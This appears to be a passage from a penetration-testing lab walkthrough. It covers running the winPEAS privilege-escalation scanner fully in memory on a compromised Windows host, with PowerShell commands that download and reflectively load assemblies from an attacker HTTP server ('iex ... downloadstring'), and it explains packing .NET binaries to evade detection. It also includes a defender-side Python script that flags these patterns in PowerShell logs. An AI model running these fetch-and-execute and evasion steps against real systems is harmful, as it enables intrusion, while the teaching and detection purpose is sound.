winPeas without touching disk

  • My favorite tool for looking for privilege escalation paths is without a doubt winPEAS.

  • We already bypassed AMSI in the previous step; what we can do now to avoid detection is put winPEAS on an HTTP server and load it in memory, so the binary never touches disk.

  • This article explains very well how to load and run an assembly with PowerShell fully in memory.

cd /var/www/html
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany_ofs.exe
python3 -m http.server 8080
  • And run winPEAS from memory with the following PowerShell commands (as winPEAS is .NET, we load the assembly and call its entry point directly):

$data = (New-Object System.Net.WebClient).DownloadData('http://192.168.56.31:8080/winPEASany_ofs.exe');
$asm = [System.Reflection.Assembly]::Load([byte[]]$data);
$out = [Console]::Out;
$sWriter = New-Object IO.StringWriter;
[Console]::SetOut($sWriter);
[winPEAS.Program]::Main("");
[Console]::SetOut($out);
$sWriter.ToString()
  • winPEAS takes several minutes to complete and then gives the prompt back with all the info (without capturing the console output, the output is empty in our basic PowerShell reverse shell; if you have a “real” shell you don’t have to do that and can just launch [winPEAS.Program]::Main(""); without the console redirection, thanks to the PowerSharpPack code for the trick).

  • If you don’t want the bother of compiling .NET apps or modifying them (public class and method, no Environment.Exit), you can also use PowerSharpPack and get everything done for you (thanks again to @ShitSecure).

iex(new-object net.webclient).downloadstring('http://192.168.56.31:8080/PowerSharpPack/PowerSharpPack.ps1')
PowerSharpPack -winPEAS
  • And we get the information about SeImpersonatePrivilege to use for escalation.
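A defender-side check for the fileless pattern in the two snippets above (the WebClient download chained into Assembly::Load, and the downloadstring chained into iex): an added example, not code from the original notes or from the PEASS-ng/PowerSharpPack projects, that scores PowerShell script block log text (Event ID 4104 ScriptBlockText) for those indicators. The sample script blocks, the host 10.0.0.5 and the weights are constructed for illustration.

```python
import re
from dataclasses import dataclass, field

# Constructed sample: ScriptBlockText of three PowerShell script block log
# events (Event ID 4104). None of these is a real captured log.
SAMPLE_SCRIPT_BLOCKS = {
    "evt-1": "$data=(New-Object System.Net.WebClient).DownloadData('http://10.0.0.5:8080/tool.exe');"
             "$asm = [System.Reflection.Assembly]::Load([byte[]]$data);"
             "$out = [Console]::Out;$sWriter = New-Object IO.StringWriter;[Console]::SetOut($sWriter);"
             "[winPEAS.Program]::Main(\"\");[Console]::SetOut($out);$sWriter.ToString()",
    "evt-2": "iex(new-object net.webclient).downloadstring('http://10.0.0.5:8080/PowerSharpPack.ps1'); PowerSharpPack -winPEAS",
    "evt-3": "Get-ChildItem C:\\Users | Where-Object { $_.PSIsContainer } | Select-Object Name",
}

# Each indicator: (name, regex, weight). Matching is case-insensitive because
# PowerShell is; the 'iex' alias and Invoke-Expression are treated alike.
INDICATORS = [
    ("remote_fetch", r"\.(DownloadData|DownloadString)\(", 2),
    ("reflective_load", r"\[System\.Reflection\.Assembly\]::Load\(", 3),
    ("console_redirect", r"\[Console\]::SetOut\(", 1),
    ("invoke_expression", r"\b(iex|Invoke-Expression)\b", 2),
    ("known_tool", r"winPEAS|PowerSharpPack", 2),
]

@dataclass
class Finding:
    event_id: str
    score: int
    hits: list = field(default_factory=list)

def analyse_script_block(event_id: str, text: str) -> Finding:
    """Score one script block; hits lists the indicator names that matched."""
    hits = [name for name, rx, _ in INDICATORS if re.search(rx, text, re.IGNORECASE)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    # A remote fetch chained into a reflective load or into iex is the fileless
    # pattern described on this page; weight it even when no tool name appears.
    if "remote_fetch" in hits and ({"reflective_load", "invoke_expression"} & set(hits)):
        score += 3
    return Finding(event_id, score, hits)

def triage(blocks: dict, threshold: int = 5) -> list:
    """Return findings at or above threshold, highest score first."""
    findings = [analyse_script_block(eid, txt) for eid, txt in blocks.items()]
    return sorted((f for f in findings if f.score >= threshold), key=lambda f: -f.score)

if __name__ == "__main__":
    for f in triage(SAMPLE_SCRIPT_BLOCKS):
        print(f.event_id, f.score, ", ".join(f.hits))
```

Script block logging must be enabled (Turn on PowerShell Script Block Logging) for 4104 events to exist; the one-liner is also visible in that log as soon as it runs, whether or not the assembly was ever written to disk.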

Packing your .net binary for powershell

  • If you don’t want to use binaries from the internet (and you should not use pre-compiled code grabbed from GitHub on a pentest engagement), you can also pack your own binary with the following script: EncodeAssembly.ps1

  • This script is a modification of the one from @snovvcrash’s website plus some code from PowerSharpPack.

  • Pack with the following commands:

. .\EncodeAssembly.ps1
Invoke-EncodeAssembly -binaryPath winPEAS.exe -namespace winPEAS -capture $true
  • To be usable as a reflective assembly in PowerShell, remember you should avoid Environment.Exit() in the .NET code, and you must make the class and the Main method public.
